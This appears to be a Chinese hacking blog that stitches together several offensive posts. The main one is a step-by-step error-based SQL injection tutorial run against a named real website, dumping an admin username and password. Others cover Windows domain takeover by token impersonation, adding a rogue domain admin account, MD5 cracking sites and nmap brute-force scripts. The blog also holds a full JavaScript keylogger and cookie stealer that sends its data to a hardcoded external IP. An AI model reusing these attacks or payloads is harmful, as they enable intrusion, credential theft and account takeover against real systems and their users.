Chinadu's Blog

So a few XPath Injection tutorials have been getting posted, and since I haven't seen much info on the updatexml method, I'd thought I'd make a quick tutorial for it.Now I'll be going over both methods just for the sake of adding it to my mega-thread.

Extract Value

I'll be using this site as an example.

Version (ExtractValue)

This will return our XPATH Syntax error, and give us our version.
This is what my link looks like.
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,version()))--

You should get your version.

Getting The Tables (Extract Value)

Code:+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema. ​tables+where+table_schema=database()+limit+0,1)))--
My link looks like this.
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+table_name+from ​+information_schema.tables+where+table_schema=database()+limit+0,1)))--

So lets load it up and see if we get our first table name!

Code:

XPATH syntax error: '~pdigclicks'
Woot it worked! Now we just increment in our limit statement until we find our table we want columns from.

(#‵′)凸
We want users or admin..
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+table_name+from ​ +information_schema.tables+where+table_schema=database()+limit+[b]2[/b],1)))--

Code:

XPATH syntax error: '~pdigexcludes'

Woot, now let's get the columns.

Getting The Columns (ExtractValue)
First off, we want to convert our table name to hex.
My table name was tbladmin.
Whenever you convert something to hex, you add 0x in front of it.
It tells the site to read the hex value.
The hex of tbladmin is 74626c61646d696e
So it should look like this.
Code:0x74626c61646d696e
Now to get our columns, we change our syntax a bit, but it's still generally the same idea.
Code:+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema ​.columns+where+table_name=0xTABLE_HEX+limit+0,1)))--]
Of course, replace TABLE_HEX with the hex value of your table name.
My link looks like this.
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+column_name+fro ​ m+information_schema.columns+where+table_name=0x74626c61646d696e+limit+0,1)))--

Now use increment in your limit statement until you find the columns you want.

Getting Data Out of Columns (ExtractValue)

Now that you've got your column names, you're going to want to put them in a concat statement.

Code:+and+extractvalue(rand(),concat(0x7e,(select+concat(column1,0x7e,column2)+from+T​ABLENAME+limit+0,1)))--
My columns I wanted were username and password, the 0x7e is the hex value of "~" which I'll use as a seperator.
My link looks like this.
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+concat(username ​,0x7e,password)+from+tbladmin+limit+0,1)))--
And as you can see, we get our XPath error with the admin login.

Code:XPATH syntax error: '~ishir~ishir123'

UpdateXML

Getting The Version (UpdateXML)

My link looks like this..

We get our XPATH Error that returns the version.
Code:

Getting The Tables (UpdateXML)

My link looks like this..

Code:

Now we know our first table is called pdigclicks. Let's see what else is in here....
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+updatexml(0x7e,concat(0x7e,((select+concat(table_name)+ ​ from+information_schema.tables+where+table_schema=database()+limit+1,1))),0)--

For the sake of time, I know the table name I want is tbladmin.
Code:leadacidbatteryinfo.org/newsdetail.php?id=52+and+updatexml(0x7e,concat(0x7e,((select+concat(table_name)+ ​ from+information_schema.tables+where+table_schema=database()+limit+10,1))),0)--
And there's our table.
Code:

Now let's get the columns from the table.

Getting Columns (UpdateXML)

Now it's the same idea, we just change the tables to columns, from the table name.

Now my table name was tbladmin, so I convert that to hex and get 74626c61646d696e

My link looks like this.

Getting Data (UpdateXML)

Now once you've got your columns, concatenate them and get the from the table you want.
Code:

My link looks like this..
Code:

渗透某内网时，得一内网SA，外网映射IP未知，开80端口，服务器不可外连，渴此机IIS配置信息，Google之，得方法，遂共享。

iiscnfg /export /f c:\chinadu.xml /sp / /children /inherited

但很多情况下如果在服务器直接执行的话，会报错cscript不是默认vbs解释器(iiscnfg是个VBS文件iiscnfg.vbs),所以我们应该用cscript加参数来运行:

cscript C:\WINDOWS\system32\iiscnfg.vbs /export /f c:\chinadu.xml /sp / /children /inherited

PS:开始/sp参数后面的路径老不对，后来发现用“/”根路径就可以了，信息还更全。
详细参数请Google。

PS:
标签有网站基本配置信息
标签有网站目录配置信息和其他配置信息
其它自己看

Get administrator rights on a workstation which is on a windows domain using whatever method you can find. (exploit, stolen password, smbrelay, phishing, etc). Look for the domain server. There are a variety of ways to do this. You can arp -a to find active IP’s or ping scan the network and then use the nbtstat tool to look for the right domain controller identifier or an obvious hostname.

You can also browse the network neighborhood or use the net view command.

Aquiring and cracking the hashes of your target is generally useful as well.

Enumerate group membership so you know who to target.

Get the usernames in the local administrators group:

C:WINDOWSsystem32>net localgroup administrators
net localgroup administrators
Alias name  administrators
Comment     Administrators have complete and unrestricted access to the computer/domain

Members
--------------------------------------
Administrator
BLACKHATDomain Admins
hacked
local_valsmith
root
The command completed successfully.

Enumerate the domain admins

C:WINDOWSsystem32>net group "domain admins" /domain
net group "domain admins" /domain
The request will be processed at a domain controller for domain blackhat.com.

Group name   Domain Admins
Comment      Designated administrators of the domain

Members

---------------------------------------------------
admin_valsmith      Administrator
The command completed successfully.

So admin_valsmith is our target domain admin. Lets say the workstation we hacked is on 172.16.1.10. We now need to find out of there are any security tokens we can access.

c:incognito>incognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 list_tokens -u
[*] Attempting to establish new connection to \172.16.1.10IPC$
[*] Logon to \172.16.1.10IPC$ succeeded
[*] Copying service to \172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-FC12020A7EED}
[*] Redirecting I/O to remote process

[*] Enumerating tokens
[*] Listing unique users found...

Delegation Tokens Available
==========================================
NT AUTHORITYLOCAL SERVICE
NT AUTHORITYNETWORK SERVICE
NT AUTHORITYSYSTEM
XPCLIENTlocal_valsmith

Impersonation Tokens Available
==========================================
BLACKHATadmin_valsmith
NT AUTHORITYANONYMOUS LOGON

[*] Service shutdown detected. Service executable file deleted
[*] Deleting service

So admin_valsmith is our target domain administrator and an impersonation token is available to us!

The above command assumes we have cracked the hash of the local admin and retrieved the password. This will connect to IPC$ share on the target and list any tokens that are available.

Next we will utilize this token to gain domain admin rights:

C:incognitoincognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 execute -c "blackhatadmin_valsmith" cmd

[*] Attempting to establish new connection to \172.16.1.10IPC$
[+] Logon to \172.16.1.10IPC$ succeeded
[*] Copying service to \172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-9047A294CE6D}
[*] Redirecting I/O to remote process

[*] Enumerating tokens
[*] Searching for availability of requested token
[+] Requested token found
[-] No Delegation token available
[*] Attempting to create new child process and communicate via anonymous pipe
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWSsystem32>whoami
whoami
admin_valsmith

So we now have a shell with the rights of the domain administrator. We will add an account to the domain controller to demonstrate our access:

C:net user hacked 0h3ck3d! /add /domain
net user hacked 0h3cked! /add /domain
The request will be processed at a domain controller for domain blackhat.com.

The command completed successfully.

Now we want to add our account to the domain admin group. NOTE: often you don’t want to add an account, especially one named hacked as it is likely to be discovered by the admins.

C:net group "domain admins" hacked /add /domain
net group "domain admins" hacked /add /domain
The reuqest will be processed at a domain controller for domain blackhat.com

The command completed successfully.

At this point we have control over the domain and can likely log into any workstation which is on the domain.

Some further related reading:

One token to Rule them All: Post-Exploitation Fun in Windows Environments

Security implications of windows access tokens

Meta-Post_Exploitation.pdf

结 合这两点，由于php本身的一种运行方式是以apache的mod方式在apahe进程中存在的，所以对于php来说，他的自身进程也就是apache的 进程，所有apache原来在root下打开的文件描述符，他都能操作。于是乎，原有修补完毕的漏洞，经过PHP新功能的妙手回春，又重现江湖了。

那么究竟如何利用这个漏洞呢？在之前的那篇文章里， 我曾经给出了一个例子，就是直接复用当前连接80端口的socket，生成一个交互性shell。当时我没有给出自动化查找当前连接80端口socket 的实现，但实际上，在写文章的时候，我就私底下给出过一个利用shell工具自动化查找当前socket连接的方法：

但当时的例子已经不能在apache补丁后使用了，因为他用到了子进程再重定向输入输出来实现端口复用。而现在由于不能使用子进程来做这些事情，因此所有难点就集中在如何自动化的查找当前连接的socket上。

仔细看上面那些代码的原理，不过是使用netstat来进行当前系统中socket信息的输出比对。既然如此，我只要手工实现netstat的功能即可。那netstat又是如何实现的呢？
阅读全文...

open_basedir可将用户访问文件的活动范围限制在指定的区域，通常是其家目录的路径，也可用符号"."来代表当前目录。注意用open_basedir指定的限制实际上是前缀,而不是目录名。
举例来说: 若"open_basedir = /dir/user", 那么目录 "/dir/user" 和 "/dir/other"都是可以访问的。所以如果要将访问限制在仅为指定的目录，请用斜线结束路径名。
open_basedir也可以同时设置多个目录,在Windows中用分号分隔目录,在任何其它系统中用冒号分隔目录。当其作用于Apache模块时，父目录中的open_basedir路径自动被继承。

Apache+PHP配置方法有三种：
方法一：在php.ini里配置
open_basedir = .:/tmp/

方法二：在Apache配置的VirtualHost里设置(httpd-vhosts.conf)
php_admin_value open_basedir .:/tmp/

方法三：在Apache配置的Direcotry里设置
php_admin_value open_basedir .:/tmp/

阅读全文...

#./vmware-install.pl
bash:./vmware-install.pl :/usr/bin/perl:bad interpreter:No such file or directory.
如果出现这个提示，则表明系统没有安装Perl环境，可以使用如下命令来提供Perl支持：
#yum groupinstall "Perl Support"

Searching for GCC...
The path "" is not valid path to the gcc binary.
Would you like to change it? [yes]
如果出现这个就表明gcc没有安装

yum install gcc gcc-c++ automake make
将编译环境一次装好
阅读全文...

国内:www.cmd5.com(收费，国内最强大的)

国内：http://www.md5.com.cn/ (有特色，还没怎么用)

国内：www.xmd5.com(还不错)

国外：http://www.c0llision.net/webcrack.php(免费，还不错)

国外：http://hashkiller.com/ (免费，相当强大!!!)

国外：http://ops.conus.info/(免费，少有的oracle hash在线破解网站)

以上几个网站在我使用过程当中查询md5我感觉hashkiller和cmd5最强大，其实cmd5更强些，但是hashkiller是完全免费 的！所以hashkiller=cmd5>xmd5>collision，从测试来看，就md5和md5+salt来说，cmd5.com后 台破解比它的查询强大。

值得一提的是，很多只能靠cmd5.com后台破的md5密码能靠hashkiller网站直接查出来，只有少部分密码不行。可以先用 hashkiller和collision查询，再用cmd5和xmd5查询，然后再考虑使用cmd5后台破解功能，如果还破不出来那可能就真的破不出来 了。其实这五个网站也是一种检验自己密码强度的最佳方法，看看自己的密码是否在这数万亿的字典当中。另外需要补充的是，collision支持批量查 询：）

var keys=''; //储存键盘鼠标记录

var hacker = 'http://218.6.132.15:8080/xss.php';

var Url = window.location;

var Domain = document.domain;

var Cookie = document.cookie;

 

document.onkeypress = function(e) { //劫持键盘消息

get = window.event ? event:e;

key = get.keyCode ? get.keyCode : get.charCode;

switch(key){

case 32 : key = '[Space]';break;

case 13 : key = '[Enter]';break;

case 8 : key = '[BackSpace]';break;

default :

key = String.fromCharCode(key);

keys += key;

}

}

 

window.onload = function(){ //窗口加载后发送cookie

setInterval(function(){

var Cookie_t = document.cookie;

if(Cookie_t != Cookie){

Cookie = Cookie_t;

}

SendData(hacker + '?m=c&c=' + Cookie);

},2000); //每2秒检测一次cookie,如果变化，就重新发送

}

document.onmousedown = function(e) {

get = window.event ? event : e; //创建事件对象

var mousekey = get.button; //获取鼠标键代码

switch(mousekey) {//1 鼠标左键 2 鼠标右键 4 滚动键

case 1 :

mousekey = '[Left Mouse Clik]';break;

case 2 :

mousekey = '[Right Mouse Clik]';break;

case 4 :

mousekey = '[Roll Mouse Clik]';break;

default :

mousekey = '[Unknown Mouse Key]';

}

keys += mousekey;

}

function SendData(src){

new Image().src = src; //建立图片对象用于发射数据

}

 

setInterval(function(){ SendData(hacker + '?m=k&c=' + keys);keys = ''; },5000); //每五秒发送一次键盘记录，初始化变量

官方说明：http://nmap.org/nsedoc/

选了些自我感觉特别实用的：

ms-sql-brute

nmap -sV –script=ms-sql-brute <target>

ms-sql-xp-cmdshell

Example Usage：

nmap -sV –script=ms-sql-xp-cmdshell <target>
Script Output

PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| mssql-xp-cmdshell:
|   Command: ipconfig /all; User: sa
|   output
|
|   Windows IP Configuration
|
|      Host Name . . . . . . . . . . . . : EDUSRV011
|      Primary Dns Suffix  . . . . . . . : cqure.net
|      Node Type . . . . . . . . . . . . : Unknown
|      IP Routing Enabled. . . . . . . . : No
|      WINS Proxy Enabled. . . . . . . . : No
|      DNS Suffix Search List. . . . . . : cqure.net
|
|   Ethernet adapter Local Area Connection 3:
|
|      Connection-specific DNS Suffix  . :
|      Description . . . . . . . . . . . : AMD PCNET Family PCI Ethernet Adapter #2
|      Physical Address. . . . . . . . . : 08-00-DE-AD-C0-DE
|      DHCP Enabled. . . . . . . . . . . : Yes
|      Autoconfiguration Enabled . . . . : Yes
|      IP Address. . . . . . . . . . . . : 192.168.56.3
|      Subnet Mask . . . . . . . . . . . : 255.255.255.0
|      Default Gateway . . . . . . . . . :
|      DHCP Server . . . . . . . . . . . : 192.168.56.2
|      Lease Obtained. . . . . . . . . . : den 21 mars 2010 00:12:10
|      Lease Expires . . . . . . . . . . : den 21 mars 2010 01:12:10
|

mysql-brute

Example Usage

nmap -sV –script=mysql-brute <target>

Script Output

阅读全文...

allinone: Linux pentest tools from HUC China

A great app level backdoor in Linux . Very useful while doing Linux pentest.

Written by Lion [HUC(Hack Union of China)] at year 2002

The source code has some errors in packetstromsecurity’s archive; Now all fixed by akshell(http://www.linuxpentest.com)
阅读全文...

simeon
Citrix系统以前听说过，未真正操作过，对于Citrix系统的研究来自与好友Mickey的指导，后面对此进行了一些研究，应该说小有心得，撰文与大家一起分享。
一、Citrix简介
Citrix是Citrix Systems, Inc.的一款主打产品，该公司主要提供全球接入架构解决方案，其解决方案能够让客户在任何时间、任何地点、在任何设备上，通过任何形式的网络连接，高效 获取各种应用、信息及通讯。Citrix技术使得数字办公室无处不在，令工作轻松易行。　　 Citrix以代号CTXS于Nasdaq Stock MarketSM上市，并获列入标准普尔500指数。2001财年公司总收益为5.92亿美元。Citrix 总部设于美国佛罗里达州 Fort Lauderdale，公司网站 http://www.citrix.com。
Citrix是一款广泛流行的远程桌面控制程序，类似于Microsoft的远程终端（Terminal Services）。只是其原理不同，Microsoft Terminal Services使用的是RDP(远程桌面协议，Remote Desktop Protocol)协议，而Citrix使用的是ICA (独立计算机架构，Independent Computing Architecture)协议。ICA技术已成为基于服务器计算模式的工业基础。ICA包括了包括以下三个重要内容：
阅读全文...

在我们渗透工作中，只要能入侵windows域中任意一台主机，就能通过一些猥琐技巧拿到域服务器管理员权限。但是有时要入侵一些域内用户终端，有 时我们只知道目标的用户名，但是无法判断他在哪台机器上面登录，若是通过bginfo记录登录事件的话，那也要需要很长时间，但还不一定我们的域控制器就 可以控制他，所以我们就可以利用用户登录脚本实现让这台机器中马。这样解决了用户可以访问域但是域控制器不可以管理用户登录机器的情况。

这里我说明一点，当域用户在本机属于power users组以下权限时，是无法运行exe的，我们根本无法判断用户在登录机器上的权限，所以我们只有认为用户是非系统管理员权限，利用lsrunas.exe工具来提取权限。

我们打开域的netlogon共享

阅读全文...